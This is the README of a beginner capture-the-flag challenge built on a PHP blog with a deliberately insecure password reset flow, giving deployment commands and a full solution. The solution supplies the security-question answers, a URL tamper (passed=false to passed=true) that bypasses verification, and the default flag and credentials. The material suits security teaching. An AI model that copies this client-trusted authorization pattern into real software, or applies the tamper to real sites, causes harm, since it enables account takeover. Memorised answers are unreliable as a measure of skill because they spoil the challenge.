Password Reset Vulnerability Challenge

A blog with a vulnerable password reset system. Exploit the HTTP method vulnerability to reset the admin password and access the flag.

Challenge Description

You've discovered a blog with a password reset system that has some serious security flaws. The admin has a hidden post. Exploit the vulnerable password reset system and reset the admins password. Login and

Building and Running

Using Makefile

The easiest way to deploy and manage this challenge is using the provided Makefile:

# Show available commands
make help

# Quick deployment with custom flag
make quick-deploy FLAG=flag{custom_flag_here}

# Standard deployment
make deploy

# Full rebuild
make rebuild

# Clean up
make clean

Using Docker Compose

1. Build and run the challenge:

docker-compose up -d

2. Access the challenge at: http://localhost

Using Custom Flag

To run with a custom flag, set the environment variable:

# Method 1: Use Makefile
make deploy FLAG=flag{custom_flag_here}

# Method 2: Export environment variable
export FLAG="flag{custom_flag_here}"
docker-compose up -d

# Method 3: Set environment variable before running
FLAG="flag{custom_flag_here}" docker-compose up -d

Using Build Script

./build.sh

Manual Docker Commands

If you prefer to run containers manually:

# Build the web image
docker build -t password-reset .

# Run MySQL container
docker run -d --name mysql \
  -e MYSQL_ROOT_PASSWORD=root_password \
  -e MYSQL_DATABASE=blog \
  -e MYSQL_USER=blog \
  -e MYSQL_PASSWORD=blog_password \
  -v $(pwd)/other/db.sql:/docker-entrypoint-initdb.d/init.sql \
  mysql:8.0

# Run web container
docker run -d --name web \
  -p 80:80 \
  -e FLAG="flag{custom_flag}" \
  -e DB_HOST=mysql \
  --link mysql \
  password-reset

Solution

The challenge involves exploiting multiple vulnerabilities in the password reset system:

Step 1: Explore the Application

• Visit the main page to understand the blog structure
• Notice there's a login page and password reset functionality

Step 2: Start Password Reset Process

• Navigate to the password reset page (reset1.php)
• Enter "admin" as the username

Step 3: Discover Security Questions

• At reset2.php, you'll see the security questions
• Security Question 1: "What is the difference between a GET request and a POST request and why does it matter to me specifically?"
• Answer 1: "Well clearly a GET request is used to retrieve data from a server, while a POST request is used to send data to a server."
• Security Question 2: "If a wood chuck could chuck wood as efficiently as they claim, how much wood would a wood chuck chuck if Chuck in fact didnt chuck any wood, but could and still would chuck wood if Chuck were a wood chuck?"
• Answer 2: "I would say 42? Perchance."

Step 4: Bypass Security questions

• Answer the security questions
• Examine the url and notice the params that have been added. reset3.php?passed=false&username=admin
• Change passed=false to passed=true and reload

Step 5: Reset Password

• Add new and confirm password
• Login with new credentials

Vulnerabilities

1. HTTP Method Vulnerability: All password reset data is passed via GET parameters, exposing sensitive information in URLs and browser history
2. No Rate Limiting: No protection against brute force attacks

File Structure

passwordreset/
├── challenge.json     # Challenge metadata and configuration
├── Dockerfile         # Container definition
├── docker-compose.yml
├── build.sh          # Build script
├── README.md        
├── generate_sql.sh   # Database initialization script
├── web/              # Application source code
│   ├── index.php     
│   ├── login.php     
│   ├── reset1.php    
│   ├── reset2.php    
│   ├── reset3.php    
│   ├── reset4.php    
│   └── db.php        # Database connection
│   └── images/       # Images files
│       ├── cat-hugs.gif
│       ├── celebrate-1.gif
│       ├── celebrate-2.webp
│       ├── educaplay-computer.jpg
│       ├── failed.gif
│       ├── remember.gif
│       ├── skeleton-doot.webp
│       ├── stars.gif
│       ├── thinking-math.webp
│       └── uh-uh-uh.gif
│   └── css/          # CSS files
│       └── main.css 
└── other/            # Database files
    ├── db.sql        # Database schema and data
    └── mysql.conf    # MySQL configuration

Configurable Variables

The challenge supports the following configurable variables:

• FLAG: The flag value for this challenge instance
• DB_USER: MySQL database username
• DB_PASSWORD: MySQL database password
• DB_NAME: MySQL database name
• MYSQL_ROOT_PASSWORD: MySQL root password
• CHALLENGE_NAME: Container naming prefix

Technical Details

• Web Base Image: PHP 8.2 with Apache
• Database: MySQL 8.0
• Port: 80
• Flag Environment Variable: FLAG
• Default Flag: flag{Maybe_I_Should_Use_Something_Other_Than_The_Get_Method}
• Admin Username: admin
• Admin Password: blog_password

Difficulty Level

Beginner - This challenge introduces basic web security concepts:

• Understanding HTTP methods and their security implications
• Password reset security flaws
• Admin privilege escalation